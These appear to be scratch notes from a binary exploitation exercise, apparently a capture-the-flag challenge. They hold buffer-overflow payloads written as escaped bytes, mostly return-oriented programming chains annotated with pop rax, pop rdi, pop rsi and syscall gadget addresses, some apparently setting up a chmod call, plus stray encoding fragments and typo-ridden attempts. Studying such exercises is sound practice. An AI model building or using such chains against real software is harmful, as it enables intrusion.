aedgibaie
154792195
bfehjcbjf
icexpial
idocious
105 100 111 99 105 111 117 115 
97 6c 69 64 6F 63 69 6F 75 73
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11
AAAAAAAAAAAAAAAA\x01\x01\x01\x01\x01\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00

AAAAAAAAAAAAAAAA\x01\x01\x01\x01\x01\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00
\x00AAAAAAAAAAAAAAAAAAAAAAx40\x0E\x71

\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x01\x01\x01\x01\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x48\x00\x00\x00\x00\x00\x40\x0E\x71


AAAAAAAAAAAAAAAA\x01\x01\x01\x01\x01\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00

\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
\x97\x97\x97\x97\x97\x97\x97\x97\x97\x97\x97\x97\x97\x97\x97\x97\x97\x97\x97\x97\x97\x97\x97\x97\x97\x97\x97\x97\x97\x97\x97\x97

\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x71\x0E\x40\x00\x00\x00\x00\x00\x71\x0E\x40\x00\x00\x00\x00\x00


AAAAAAAAAAAAAAAAAAAAAAAA\x71\x0E\x40

Aaaaaaaaaaaaaaa\0x00\0x00\0x00\0x00\0x00\0x00\0x00\0x00\0x00
\x71\x0E\x40\0x00\0x00\0x00\0x00\0x00
\0x48\0x00\0x00\0x00\0x00\0x00\0x00\0x00
\0x2c\x0e\x40\0x00\0x00\0x00\0x00\0x00
\x3c\0x00\0x00\0x00\0x00\0x00\0x00\0x00
\x2d\x05\x40\0x00\0x00\0x00\0x00\0x00


000000000000000000000000\x71\x0E\x40\x00\x00\x00\x00\x00\x3c\x00\x00\x00\x00\x00\x00\x00\x6d\x1b\x40\x00\x00\x00\x00\x00\x48\x00\x00\x00\x00\x00\x00\x00\x78\x11\x40\x00\x00\x00\x00\x00
-------buffer-----------|-----------address 1-----------|------------pop rax------------|-----------address 2-----------|------------pop rdi------------|-----------address 3----------|


000000000000000000000000\x71\x0E\x40\x00\x00\x00\x00\x00\x53\x00\x00\x00\x00\x00\x00\x00\xA1\x1D\x40\x00\x00\x00\x00\x00\xED\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x11\x40\x00\x00\x00\x00\x00


000000000000000000000000\x71\x0E\x40\x00\x00\x00\x00\x00\x53\x00\x00\x00\x00\x00\x00\x00\xa1\x1d\x40\x00\x00\x00\x00\x00\xed\x01\x00\x00\x00\x00\x00\x00\xed\x01\x00\x00\x00\x00\x00\x00\x78\x11\x40\x00\x00\x00\x00\x00
-------buffer-----------|-----------address 1-----------|------------pop rax------------|-----------address 2-----------|------------pop rsi------------|------------pop r15------------|-----------address 3----------|




\x2d\x05\x40\x00\x00\x00\x00\x00
000000000000000000000000

overflow
pop rdi address
rdi value
pop rax address
rax value
syscall address